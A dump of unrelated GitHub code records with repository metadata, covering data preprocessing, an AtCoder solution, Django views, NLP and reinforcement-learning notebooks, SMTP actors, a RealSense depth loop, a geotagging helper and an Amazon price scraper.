list(set(user_ids_old).intersection(set(user_ids)))]\n final_poi = [task_id2idx_dict_small[k] for k in list(set(poi_ids_old).intersection(set(poi_ids)))]\n \n if DATASET == 'Foursquare':\n w2t_df = pd.read_csv('GroundTruth_data/Foursquare/array_small_w2t.csv', header=None)\n t2w_df = pd.read_csv('GroundTruth_data/Foursquare/array_small_t2w.csv', header=None)\n if DATASET == 'Yelp':\n w2t_df = pd.read_csv('GroundTruth_data/Yelp_FGRec/array_small_w2t.csv', header=None)\n t2w_df = pd.read_csv('GroundTruth_data/Yelp_FGRec/array_small_t2w.csv', header=None)\n\n count = -1\n w2t_pre = []\n for index, row in w2t_df.iterrows():\n line_pre = []\n if index not in final_user:\n continue\n else:\n count += 1\n for p in range(len(row)):\n if p not in final_poi:\n continue\n else:\n line_pre.append(row[p])\n w2t_pre.append(line_pre)\n\n t2w_pre = []\n for index, row in t2w_df.iterrows():\n line_pre = []\n if index not in final_poi:\n continue\n else:\n for p in range(len(row)):\n if p not in final_user:\n continue\n else:\n line_pre.append(row[p])\n t2w_pre.append(line_pre)\n\n if DATASET == 'Foursquare':\n np.savetxt('GroundTruth_data/Foursquare/w2t_preference.csv', w2t_pre, delimiter=',', fmt='%s')\n np.savetxt('GroundTruth_data/Foursquare/t2w_preference.csv', t2w_pre, delimiter=',', fmt='%s')\n if DATASET == 'Yelp':\n np.savetxt('GroundTruth_data/Yelp_FGRec/w2t_preference.csv', w2t_pre, delimiter=',', fmt='%s')\n np.savetxt('GroundTruth_data/Yelp_FGRec/t2w_preference.csv', t2w_pre, delimiter=',', fmt='%s')\n \n\ndef get_assign_info(user_id2idx_dict_small, task_id2idx_dict_small, new_test_path):\n worker_info = []\n assign_info = []\n test_new_df = pd.read_csv(new_test_path)\n user_ids = list(set(test_new_df['user_id'].tolist()))\n for user_id in set(user_ids):\n user_df = test_new_df[test_new_df['user_id'] == user_id]\n worker_id = user_id2idx_dict_small[user_id]\n\n if len(user_df) == 1:\n worker_lat = user_df['latitude'].to_list()[-1]\n worker_lon = user_df['longitude'].to_list()[-1]\n worker_starttime = user_df['timestamp'].to_list()[-1]\n else:\n worker_lat = user_df['latitude'].to_list()[-2]\n worker_lon = user_df['longitude'].to_list()[-2]\n worker_starttime = user_df['timestamp'].to_list()[-2]\n\n task_id = task_id2idx_dict_small[int(user_df['poi_id'].to_list()[-1])]\n task_lat = user_df['latitude'].to_list()[-1]\n task_lon = user_df['longitude'].to_list()[-1]\n task_completetime = user_df['timestamp'].to_list()[-1]\n task_cat = user_df['poi_catid'].to_list()[-1]\n\n assign_info.append([worker_id, worker_lat, worker_lon, task_id, task_lat, task_lon, worker_starttime, task_completetime, task_cat])\n worker_info.append([worker_id, worker_lat, worker_lon, worker_starttime])\n return assign_info, worker_info\n\n\ndef get_task_info(task_id2idx_dict_small, new_test_path):\n task_info = []\n test_new_df = pd.read_csv(new_test_path)\n task_ids = list(set(test_new_df['poi_id'].tolist()))\n for t_id in task_ids:\n \n task_df = test_new_df[test_new_df['poi_id'] == t_id]\n \n try:\n task_id = task_id2idx_dict_small[t_id]\n # print(task_id)\n task_lat = task_df['latitude'].to_list()[-1]\n task_lon = task_df['longitude'].to_list()[-1]\n task_cat = task_df['poi_catid'].to_list()[-1]\n task_completetime = task_df['timestamp'].to_list()[-1]\n task_info.append([task_id, task_lat, task_lon, task_cat, task_completetime])\n except:\n import pdb; pdb.set_trace()\n \n return task_info\n\n\nif __name__ == '__main__':\n\n # DATASET = 'Foursquare'\n DATASET = 'Yelp'\n\n if DATASET == 'Foursquare':\n with 
open('/nas/project/xieyuan/Bi-preference-TA/Preference_value/Foursquare/Foursqaure_worker_to_task_preference_time_newcat.pkl', 'rb') as f_worker,\\\n open('/nas/project/xieyuan/Bi-preference-TA/Preference_value/Foursquare/Foursquare_task_to_worker_preference_time_newcat.pkl', 'rb') as f_task:\n worker2task_pre = pickle.load(f_worker)\n task2worker_pre = pickle.load(f_task)\n\n if DATASET == 'Yelp':\n with open('/nas/project/xieyuan/Bi-preference-TA/Preference_value/Yelp_FGRec/Yelp_worker_to_task_preference_time.pkl', 'rb') as f_worker, \\\n open('/nas/project/xieyuan/Bi-preference-TA/Preference_value/Yelp_FGRec/Yelp_task_to_worker_preference_time.pkl', 'rb') as f_task:\n worker2task_pre = pickle.load(f_worker)\n task2worker_pre = pickle.load(f_task)\n\n small_worker_num = len([int(x.split('_')[0]) for x,_ in worker2task_pre])\n small_task_num = len([int(x.split('_')[0]) for x,_ in task2worker_pre])\n big_worker_num = len(task2worker_pre[0][1])\n big_task_num = len(worker2task_pre[0][1])\n\n print(f'small_worker_num: {small_worker_num}')\n print(f'big_task_num: {big_task_num}')\n print(f'small_task_num: {small_task_num}')\n print(f'big_worker_num: {big_worker_num}')\n\n small_arr_w2t = np.zeros((small_worker_num, small_task_num))\n small_arr_t2w = np.zeros((small_task_num, small_worker_num))\n big_arr_w2t = np.zeros((big_worker_num, big_task_num))\n big_arr_t2w = np.zeros((big_task_num, big_worker_num))\n\n print(f'small w2t array shape: {small_arr_w2t.shape}')\n print(f'small t2w array shape: {small_arr_t2w.shape}')\n print(f'big w2t array shape: {big_arr_w2t.shape}')\n print(f'big t2w array shape: {big_arr_t2w.shape}')\n\n # # extract the preference info\n # big_arr_w2t, big_arr_t2w = big_array()\n print('--> generate small array')\n small_arr_w2t, small_arr_t2w, user_id2idx_dict_small, task_id2idx_dict_small = small_array(worker2task_pre, task2worker_pre, DATASET)\n\n # # generate checkin new data\n if DATASET == 'Foursquare':\n test_path = 'data-process/Foursquare/Foursquare_test.txt'\n new_test_path = 'data-process/Foursquare/Foursquare_test_new.txt'\n if DATASET == 'Yelp':\n test_path = 'data-process/Yelp_FGRec/Yelp_test.txt'\n new_test_path = 'data-process/Yelp_FGRec/Yelp_test_new.txt'\n \n # generate new test dataset\n # new_test_data(user_id2idx_dict_small, task_id2idx_dict_small, test_path, new_test_path)\n # # get the w2t & t2w preference score\n print('--> preference info')\n get_pre_info(user_id2idx_dict_small, task_id2idx_dict_small, test_path, new_test_path, DATASET)\n\n # get final assignment info\n print('--> info...')\n assign_info, worker_info = get_assign_info(user_id2idx_dict_small, task_id2idx_dict_small, new_test_path)\n # # get worker & task info\n task_info = get_task_info(task_id2idx_dict_small, new_test_path)\n\n import pdb; pdb.set_trace()\n\n if DATASET == 'Foursquare':\n goundtruth_path = 'GroundTruth_data/Foursquare/task_assignment_groundtruth.csv'\n worker_info_path = 'GroundTruth_data/Foursquare/worker_info.csv'\n task_info_path = 'GroundTruth_data/Foursquare/task_info.csv'\n if DATASET == 'Yelp':\n goundtruth_path = 'GroundTruth_data/Yelp_FGRec/task_assignment_groundtruth.csv'\n worker_info_path = 'GroundTruth_data/Yelp_FGRec/worker_info.csv'\n task_info_path = 'GroundTruth_data/Yelp_FGRec/task_info.csv'\n\n with open(goundtruth_path, 'w') as f_GT:\n writer = csv.writer(f_GT)\n writer.writerow(['worker_id', 'worker_lat', 'worker_lon', 'task_id', 'task_lat', 'task_lon', 'worker_start', 'task_complete', 'task_category'])\n writer.writerows(assign_info)\n \n 
with open(worker_info_path, 'w') as f_W:\n writer = csv.writer(f_W)\n writer.writerow(['worker_id', 'worker_lat', 'worker_lon', 'worker_start'])\n writer.writerows(worker_info)\n \n with open(task_info_path, 'w') as f_T:\n writer = csv.writer(f_T)\n writer.writerow([ 'task_id', 'task_lat', 'task_lon', 'task_category', 'task_complete'])\n writer.writerows(task_info)\n\n","repo_name":"eeeeeexy/BPPTA","sub_path":"dataprocess_final.py","file_name":"dataprocess_final.py","file_ext":"py","file_size_in_byte":13955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"26799216363","text":"a,b=map(int,input().split())\n\ndef f(n):\n p=0\n if n%2==1:\n p=(n+1)//2\n if p%2==0:\n return 0\n else:\n return 1\n else:\n p=n//2\n if p%2==0:\n return n^0\n else:\n return n^1\n\nprint(f(a-1)^f(b))","repo_name":"Valkyrja3607/AtCoder","sub_path":"atcoder.jp/abc121/abc121_d/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"71315012475","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom .models import Todo\nfrom .forms import TodoForm\n# Create your views here.\ndef index(request):\n\tobjs = Todo.objects.all()\n\tform = TodoForm()\n\tcontent ={\n\t\t\"objects\":objs,\n\t\t\"form\":form\n\t}\n\tif request.method==\"POST\":\n\t\tform = TodoForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\n\t\treturn redirect('/')\n\treturn render(request, \"todo/index.html\",content)\n\ndef update(request, pk):\n\tupdatedtodo = Todo.objects.get(id=pk)\n\n\tform = TodoForm(instance = updatedtodo)\n\tcontent = {\n\t\t'form':form\n\t}\n\tif request.method == \"POST\":\n\t\tform = TodoForm(request.POST,instance = updatedtodo)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\treturn redirect('/')\n\treturn render(request,\"todo/edit.html\", content)\n\n\ndef delete(request, pk):\n\titem = Todo.objects.get(id = pk)\n\tcontent = {\"item\": item}\n\tif request.method==\"POST\":\n\t\titem.delete()\n\t\treturn redirect('/')\n\treturn\trender(request, 'todo/delete.html', content)","repo_name":"yasser-khelalef/Django-Projects","sub_path":"ToDo App/todo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"39303226754","text":"# (a) Ask the user to enter a sentence and print out the third word of the sentence.\n# (b) Ask the user to enter a sentence and print out every third word of the sentence.\n\nuser_str = input('Provide a sentence: ')\n\nsplitted_str = user_str.split(' ')\n\nprint(splitted_str[2])\n\n# Provide a sentence: Tade runs very fast.\n# very","repo_name":"shinaeli/My-Python-Codes","sub_path":"A Practical Introduction To Python Programming/Exercise 8.7/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"40352036279","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[4]:\n\n\nget_ipython().system('pip install nltk -U')\nget_ipython().system('pip install bs4 -U')\n\n\n# In[6]:\n\n\nimport nltk\nnltk.download('stopwords')\nnltk.download('punkt')\nnltk.download('wordnet')\nnltk.download('averaged_perceptron_tagger')\n\n\n# In[7]:\n\n\nimport nltk\n\n\n# In[8]:\n\n\npara='Rajgad (literal meaning Ruling Fort) is a Hill region fort 
situated in the Pune district of Maharashtra, India. Formerly known as Murumbdev, the fort was the first capital of the Maratha Empire under the rule of Chhatrapati Shivaji for almost 26 years, after which the capital was moved to the Raigad Fort.[1] Treasures discovered from an adjacent fort called Torna were used to completely build and fortify the Rajgad Fort'\n\n\n# In[9]:\n\n\nprint(para)\n\n\n# In[10]:\n\n\npara.split()\n\n\n# In[11]:\n\n\nfrom nltk.tokenize import sent_tokenize\nfrom nltk.tokenize import word_tokenize\n\n\n# In[12]:\n\n\nsent=sent_tokenize(para)\n\n\n# In[13]:\n\n\nsent[2]\n\n\n# In[14]:\n\n\nwords=word_tokenize(para)\n\n\n# In[15]:\n\n\nwords\n\n\n# In[16]:\n\n\nfrom nltk.corpus import stopwords\n\n\n# In[17]:\n\n\nswords=stopwords.words('english')\n\n\n# In[18]:\n\n\nswords\n\n\n# In[19]:\n\n\nx=[word for word in words if word not in swords]\n\n\n# In[20]:\n\n\nx\n\n\n# In[23]:\n\n\nx=[word for word in words if word.lower() not in swords]\n\n\n# In[24]:\n\n\nx\n\n\n# In[25]:\n\n\nfrom nltk.stem import PorterStemmer\n\n\n# In[26]:\n\n\nps=PorterStemmer()\n\n\n# In[27]:\n\n\nps.stem('working')\n\n\n# In[28]:\n\n\ny=[ps.stem(word) for word in x]\n\n\n# In[29]:\n\n\ny\n\n\n# In[30]:\n\n\nfrom nltk.stem import WordNetLemmatizer\n\n\n# In[31]:\n\n\nwnl=WordNetLemmatizer()\n\n\n# In[32]:\n\n\nwnl.lemmatize('workng', pos='v')\n\n\n# In[33]:\n\n\nnltk.download('omw-1.4')\n\n\n# In[34]:\n\n\nwnl.lemmatize('working', pos='v')\n\n\n# In[35]:\n\n\nprint(ps.stem('went'))\nprint(wnl.lemmatize('went',pos='v'))\n\n\n# In[36]:\n\n\nz=[wnl.lemmatize(word,pos='v') for word in x]\n\n\n# In[37]:\n\n\nz\n\n\n# In[38]:\n\n\nimport string\n\n\n# In[39]:\n\n\nstring.punctuation\n\n\n# In[40]:\n\n\nt=[word for word in words if word not in string.punctuation]\n\n\n# In[41]:\n\n\nt\n\n\n# In[42]:\n\n\nfrom nltk import pos_tag\n\n\n# In[43]:\n\n\npos_tag(t)\n\n\n# In[44]:\n\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\n\n# In[46]:\n\n\ntfidf= TfidfVectorizer()\n\n\n# In[47]:\n\n\nv=tfidf.fit_transform(t)\n\n\n# In[48]:\n\n\nv.shape\n\n\n# In[49]:\n\n\nimport pandas as pd\npd.DataFrame(v)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"yogeshpoul/Storage","sub_path":"DSBDA_PR_7.py","file_name":"DSBDA_PR_7.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"42161176954","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 24 22:14:21 2023\n\n@author: ben\n\"\"\"\n\nimport sys\nsys.path.append(\"../Utils\")\nfrom plot import plot\nimport gym\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n\n\n\n\ndef create_environment():\n env = gym.make(\"CartPole-v0\") # Create the environment\n return env\n \n\ndef create_network():\n \"\"\"\n Creates a neural network model that takes num_inputs \n inputs, has a hidden layer with num_hidden units and \n an output layer with num_actions units for action \n probabilities and a single output for the state value \n estimate.\n\n Parameters:\n -----------\n num_inputs : int\n The number of input features.\n num_hidden : int \n The number of units in the \n hidden layer.\n num_actions : int \n The number of possible actions.\n\n Returns:\n --------\n keras.Model: \n A compiled Keras model.\n \"\"\"\n \n inputs = layers.Input(shape=(num_inputs,))\n common = layers.Dense(num_hidden, activation=\"relu\")(inputs)\n action = layers.Dense(num_actions, 
activation=\"softmax\")(common)\n critic = layers.Dense(1)(common)\n \n model = keras.Model(inputs=inputs, outputs=[action, critic])\n return model\n\ndef train():\n eps = np.finfo(np.float32).eps.item() # Smallest number such that 1.0 + eps != 1.0\n gamma = 0.99 # Discount factor for past rewards\n max_steps_per_episode = 1000\n\n optimizer = keras.optimizers.Adam(learning_rate=0.01)\n huber_loss = keras.losses.Huber()\n action_probs_history = []\n critic_value_history = []\n rewards_history = []\n running_reward_history = []\n running_reward = 0\n episode_count = 0\n \n while True: # Run until solved\n result = env.reset()\n episode_reward = 0\n with tf.GradientTape() as tape:\n for timestep in range(1, max_steps_per_episode):\n # env.render(); Adding this line would show the attempts\n # of the agent in a pop up window.\n \n state = tf.convert_to_tensor(result[0])\n state = tf.expand_dims(state, 0)\n \n # Predict action probabilities and estimated future rewards\n # from environment state\n action_probs, critic_value = model(state)\n critic_value_history.append(critic_value[0, 0])\n \n # Sample action from action probability distribution\n action = np.random.choice(num_actions, p=np.squeeze(action_probs))\n action_probs_history.append(tf.math.log(action_probs[0, action]))\n \n # Apply the sampled action in our environment\n result = env.step(action)\n rewards_history.append(result[1])\n episode_reward += result[1]\n \n if result[2]:\n break\n \n # Update running reward to check condition for solving\n running_reward = 0.05 * episode_reward + (1 - 0.05) * running_reward\n running_reward_history.append(running_reward)\n \n # Calculate expected value from rewards\n # - At each timestep what was the total reward received after that timestep\n # - Rewards in the past are discounted by multiplying them with gamma\n # - These are the labels for our critic\n returns = []\n discounted_sum = 0\n for r in rewards_history[::-1]:\n discounted_sum = r + gamma * discounted_sum\n returns.insert(0, discounted_sum)\n \n # Normalize\n returns = np.array(returns)\n returns = (returns - np.mean(returns)) / (np.std(returns) + eps)\n returns = returns.tolist()\n \n # Calculating loss values to update our network\n history = zip(action_probs_history, critic_value_history, returns)\n actor_losses = []\n critic_losses = []\n for log_prob, value, ret in history:\n # At this point in history, the critic estimated that we would get a\n # total reward = `value` in the future. 
We took an action with log probability\n                # of `log_prob` and ended up receiving a total reward = `ret`.\n                # The actor must be updated so that it predicts an action that leads to\n                # high rewards (compared to critic's estimate) with high probability.\n                diff = ret - value\n                actor_losses.append(-log_prob * diff)  # actor loss\n\n                # The critic must be updated so that it predicts a better estimate of\n                # the future rewards.\n                critic_losses.append(\n                    huber_loss(tf.expand_dims(value, 0), tf.expand_dims(ret, 0))\n                )\n\n            # Backpropagation\n            loss_value = sum(actor_losses) + sum(critic_losses)\n            grads = tape.gradient(loss_value, model.trainable_variables)\n            optimizer.apply_gradients(zip(grads, model.trainable_variables))\n\n            # Clear the loss and reward history\n            action_probs_history.clear()\n            critic_value_history.clear()\n            rewards_history.clear()\n\n        # Log details\n        episode_count += 1\n        if episode_count % 10 == 0:\n            template = \"running reward: {:.2f} at episode {}\"\n            print(template.format(running_reward, episode_count))\n\n        if running_reward > 195:  # Condition to consider the task solved (CartPole-v0 caps episodes at 200 steps)\n            print(\"Solved at episode {}!\".format(episode_count))\n            plot(x=[],\n                 y=[running_reward_history],\n                 xlabel=\"Episodes\",\n                 ylabel=\"Reward\")\n            break\n\n\nif __name__ == \"__main__\":\n    num_inputs = 4\n    num_actions = 2\n    num_hidden = 128\n\n    env = create_environment()\n    model = create_network()\n    train()\n","repo_name":"BenBotsch/Maschinelles-Lernen","sub_path":"9_Anwendungen/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":6073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
+{"seq_id":"32861575168","text":"#!/usr/bin/env python\n#\n# -*- coding: utf-8 -*-\n#\n# Created by Adam Fiebig\n# Last modified: 4-15-2015 by Adam Fiebig\n\nfrom compysition import Actor\nfrom email.mime.text import MIMEText\nimport smtplib\nimport gsmtpd.server\nimport email\nimport traceback\nfrom bs4 import BeautifulSoup\nimport re\nfrom compysition.event import XMLEvent, JSONEvent\n\nclass SMTPOut(Actor):\n\n    input = XMLEvent\n    output = XMLEvent\n\n    '''**Module which sends mime emails with properties specified in XML event data.**\n\n    Parameters:\n\n        - name (str): The instance name.\n    '''\n\n    address_regex = re.compile(\"^.*@.*$\")\n\n    def __init__(self, name, from_address=None, domain=None, key=None, host=(\"localhost\", 25), *args, **kwargs):\n        Actor.__init__(self, name, *args, **kwargs)\n        self.blockdiag_config[\"shape\"] = \"mail\"\n        self.logger.info(\"Initialized SMTPOut Actor\")\n        self.key = key or self.name\n        self.host = host\n        self.domain = domain\n        self.address = self.normalize_address(from_address, self.domain)\n        self.body_tag = 'Body'\n\n    def normalize_address(self, address, domain):\n        \"\"\"\n        If an address does not match some_address@some_domain.com, concatenate the address and domain.\n        If the address is None, it will return None.\n        If the address is not a full address and the domain is None, it will return None.\n        \"\"\"\n        if address is not None and not self.address_regex.match(address):\n            if domain is not None:\n                address = \"{address}@{domain}\".format(address=address, domain=domain)\n            else:\n                address = None\n\n        return address\n\n    def consume(self, event, *args, **kwargs):\n        msg_xml = event.data\n        to = msg_xml.find(\"To\").text\n        from_element = msg_xml.find(\"From\")\n        from_address = self.normalize_address(from_element.text, self.domain)\n        from_element.text = from_address\n        if to != \"None\" and to is not None:\n            msg = MIMEText(msg_xml.find(self.body_tag).text)  # Create a mime obj with our body text\n            for element in msg_xml:  # Set each tag's text as a property on the MIMEText obj\n                if element.tag != self.body_tag:\n                    msg[element.tag] = element.text\n\n            try:\n                self.send(msg, to, from_address)\n            except Exception as err:\n                self.logger.error(\"Error sending message: {err}\".format(err=traceback.format_exc()), event=event)\n            else:\n                self.logger.info(\"Email sent to {to} from {from_address} via smtp server {host}\".format(to=to,\n                                                                                                        from_address=from_address,\n                                                                                                        host=self.host), event=event)\n        else:\n            self.logger.info(\"No email recipient specified, notification was not sent\", event=event)\n\n        self.send_event(event)\n\n    def send(self, msg, to, from_address):\n        sender = smtplib.SMTP(self.host)\n        sender.sendmail(from_address, to.split(\",\"), msg.as_string())\n        sender.quit()\n\n\nclass SMTPIn(Actor):\n    '''**Module which receives mime emails via an embedded SMTP server.**\n\n    Parameters:\n\n        - name (str): The instance name.\n    '''\n\n    output = [XMLEvent, JSONEvent]\n\n    def __init__(self, name, host=\"localhost\", ports=[25], output_format='xml', keyfile=None, certfile=None, ssl_version=None, *args, **kwargs):\n        Actor.__init__(self, name, *args, **kwargs)\n        self.blockdiag_config[\"shape\"] = \"mail\"\n        self.output_format = output_format\n        if not isinstance(ports, list):\n            ports = [ports]\n\n        self.servers = []\n        for port in ports:\n            server = gsmtpd.server.SMTPServer(\"{host}:{port}\".format(host=host, port=port),\n                                              keyfile=keyfile,\n                                              certfile=certfile,\n                                              ssl_version=ssl_version)\n            server.process_message = self.process_message\n            self.servers.append(server)\n\n    def pre_hook(self):\n        [server.start() for server in self.servers]\n\n    def process_message(self, peer, mailfrom, rcpttos, data):\n        headers = email.message_from_string(data)\n        payload = headers.get_payload()\n        new_data = dict(zip(headers.keys(), headers.values()))\n\n        payload_data = headers.get_payload()\n        if isinstance(payload_data, list):\n            payload = filter(lambda x: x.get_content_type() == \"text/plain\", payload)[0]\n\n            if payload is None:\n                html = filter(lambda x: x.get_content_type() == \"text/html\", payload)[0]\n                payload = BeautifulSoup(html.get_payload(), \"lxml\").get_text()\n            else:\n                payload = payload.get_payload()\n\n            payload_data = payload\n\n        new_data['payload'] = payload_data\n\n        if self.output_format == 'xml':\n            new_data['email'] = new_data\n            event = XMLEvent(data=new_data)\n        else:\n            event = JSONEvent(data=new_data)\n\n        self.send_event(event)\n\n    def consume(self, event, *args, **kwargs):\n        pass\n","repo_name":"fiebiga/compysition","sub_path":"compysition/actors/smtp.py","file_name":"smtp.py","file_ext":"py","file_size_in_byte":5347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
+{"seq_id":"12578735811","text":"from flet import *\nfrom flet_route import Params, Basket\n\nfrom packages.api import GetQuote\nfrom packages.controls import LinkButton, DisplayQuotation\nfrom packages.schemas import Quotation\nfrom packages.styles import COLORS\n\n\nclass About:\n    def __init__(self):\n        print(f\"{self.__class__.__name__.upper()}.__init__()\")\n\n    async def view(self, page: Page, params: Params, basket: Basket):\n        print(f\"-->{self.__class__.__name__.upper()}.view()\")\n        self.page = page\n\n        if not hasattr(basket, \"quote\"):\n            self.quote = Quotation(author=\"No author\", quote=\"No quotation\")\n        else:\n            self.quote = basket.quote\n\n        # ALTERNATE SYNTAX\n        # if basket.get(\"quote\") is not None:\n        # 
self.quote = basket.quote\n # else:\n # self.quote = Quotation(author=\"No author\", quote=\"No quotation\")\n\n self.display_quotation = DisplayQuotation(self.quote)\n self.home_button = LinkButton(\"HOME\", \"/\")\n\n self.screen = Container(\n Column(\n [\n Text(\n \"This quotation was passed through the BASKET.\",\n size=24,\n color=COLORS[\"text\"],\n font_family=\"Mont-Semi-Bold\",\n ),\n self.display_quotation,\n self.home_button,\n ],\n width=512,\n alignment=MainAxisAlignment.CENTER,\n ),\n bgcolor=COLORS[\"background\"],\n alignment=alignment.center,\n expand=True,\n )\n\n return View(\n \"/about\",\n controls=[self.screen],\n bgcolor=COLORS[\"background\"],\n scroll=False,\n padding=0,\n spacing=0,\n )\n","repo_name":"polae/flet-route-async","sub_path":"pages/about.py","file_name":"about.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"41519848670","text":"import pyrealsense2.pyrealsense2 as rs\nimport numpy as np\nimport cv2\nimport time as t\n\nactuators = 8\nx_res = 640\ny_res = 480\nfps = 30\nqueue_size = 50\ndecimation_level = 1\nmin_dist = 600\nmax_dist = 2000\n\ni_iter = int(y_res/decimation_level)\nj_iter = int(x_res/decimation_level)\n\n# def check_distance\ntry:\n pipeline = rs.pipeline()\n\n config = rs.config()\n config.enable_stream(rs.stream.depth, x_res, y_res, rs.format.z16, fps)\n\n frame_queue = rs.frame_queue(queue_size, keep_frames=True)\n\n decimation_filter = rs.decimation_filter(decimation_level)\n hole_filter = rs.hole_filling_filter()\n spatial_filter = rs.spatial_filter(0.5, 20, 5, 0)\n temporal_filter = rs.temporal_filter()\n depth2disparity = rs.disparity_transform()\n disparity2depth = rs.disparity_transform(False)\n \n\n pipeline.start(config, frame_queue)\n #pipeline.start(config)\n count = 0\n q_time_avg = 0\n filter_time_avg = 0\n loop_time_avg = 0\n open_cv_time_avg = 0\n\n while(True):\n t1 = t.time()\n #print(t1)\n frame = frame_queue.wait_for_frame()\n #frame = pipeline.wait_for_frames()\n depth_frame = frame.as_frameset().get_depth_frame()\n #depth_frame = frame.get_depth_frame()\n t2 = t.time() # time to queue\n depth_frame_filtered = depth_frame\n\n depth_frame_filtered = decimation_filter.process(depth_frame_filtered)\n depth_frame_filtered = depth2disparity.process(depth_frame_filtered)\n depth_frame_filtered = spatial_filter.process(depth_frame_filtered)\n depth_frame_filtered = temporal_filter.process(depth_frame_filtered)\n depth_frame_filtered = disparity2depth.process(depth_frame_filtered)\n depth_frame_filtered = hole_filter.process(depth_frame_filtered)\n\n t3 = t.time() # time to filter\n depth_image = np.asanyarray(depth_frame_filtered.get_data())\n # for i in range(i_iter):\n # for j in range(j_iter):\n # ind = (i,j)\n # if type(depth_image[i,j]) is not np.uint16:\n # depth_image[i,j] = 0\n# if depth_image[i,j] > max_dist or depth_image[i,j] < min_dist:\n# depth_image[i,j] = 0\n t4 = t.time() # loop time\n\n depth_colormap = cv2.applyColorMap(cv2.convertScaleAbs(depth_image, alpha=0.03), cv2.COLORMAP_JET)\n cv2.namedWindow('RealSense', cv2.WINDOW_AUTOSIZE)\n cv2.imshow('RealSense', depth_colormap)\n cv2.waitKey(1)\n t5 = t.time()\n #print(t5)\n #print()\n q_time_avg += t2-t1\n filter_time_avg += t3-t2\n loop_time_avg += t4-t3\n open_cv_time_avg += t5-t4\n count += 1\nfinally:\n pipeline.stop()\n q_time_avg = q_time_avg/count\n filter_time_avg = filter_time_avg/count\n loop_time_avg = loop_time_avg/count\n open_cv_time_avg 
= open_cv_time_avg/count\n total_time = q_time_avg + filter_time_avg + loop_time_avg + open_cv_time_avg\n print(q_time_avg, filter_time_avg, loop_time_avg, open_cv_time_avg, total_time)\n print('pipeline stop')\n","repo_name":"awmckenzie/24452-Design-II","sub_path":"realsense_frame_q.py","file_name":"realsense_frame_q.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"21352762603","text":"import os\nimport typing as T\n\nfrom . import image_log\nfrom . import processing\n\n\ndef process_geotag_properties(\n import_path: T.Optional[str] = None,\n video_import_path: T.Optional[str] = None,\n geotag_source=\"exif\",\n geotag_source_path: T.Optional[str] = None,\n offset_time=0.0,\n offset_angle=0.0,\n skip_subfolders=False,\n) -> None:\n if not import_path or not os.path.isdir(import_path):\n raise RuntimeError(\n f\"Error, import directory {import_path} does not exist, exiting...\"\n )\n\n process_file_list = image_log.get_total_file_list(\n import_path,\n skip_subfolders=skip_subfolders,\n )\n if not process_file_list:\n return\n\n if geotag_source == \"exif\":\n return processing.geotag_from_exif(process_file_list, offset_time, offset_angle)\n\n elif geotag_source == \"gpx\":\n if geotag_source_path is None:\n raise RuntimeError(\n \"GPX file is required to be specified with --geotag_source_path\"\n )\n return processing.geotag_from_gpx_file(\n process_file_list,\n geotag_source_path,\n offset_time=offset_time,\n offset_angle=offset_angle,\n )\n elif geotag_source == \"nmea\":\n if geotag_source_path is None:\n raise RuntimeError(\n \"NMEA file is required to be specified with --geotag_source_path\"\n )\n return processing.geotag_from_nmea_file(\n process_file_list,\n geotag_source_path,\n offset_time=offset_time,\n offset_angle=offset_angle,\n )\n elif geotag_source == \"gopro_videos\":\n if geotag_source_path is None:\n geotag_source_path = video_import_path\n if geotag_source_path is None:\n raise RuntimeError(\"geotag_source_path is required\")\n return processing.geotag_from_gopro_video(\n process_file_list,\n geotag_source_path,\n offset_time=offset_time,\n offset_angle=offset_angle,\n )\n else:\n raise RuntimeError(f\"Invalid geotag source {geotag_source}\")\n","repo_name":"mapilio/mapilio-kit","sub_path":"mapilio_kit/process_geotag_properties.py","file_name":"process_geotag_properties.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"96"} +{"seq_id":"33607361520","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\nPRODUCT_URL = \"https://www.amazon.com/Logitech-SUPERLIGHT-Ultra-Lightweight-Programmable-Compatible/dp/B087LXCTFJ\"\nHEADERS = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) \"\n \"AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/99.0.4844.51 Safari/537.36\",\n \"Request Line\": \"GET / HTTP/1.1\",\n}\n\nresponse = requests.get(url=PRODUCT_URL, headers=HEADERS)\nproduct_webpage = response.text\n\nsoup = BeautifulSoup(product_webpage, \"html.parser\")\nprice = soup.find(name=\"span\", class_=\"a-size-base a-color-price a-text-bold\")\n\nprint(soup.prettify())\n\n","repo_name":"terminhnator/LearningPython","sub_path":"day 47/Amazon Price 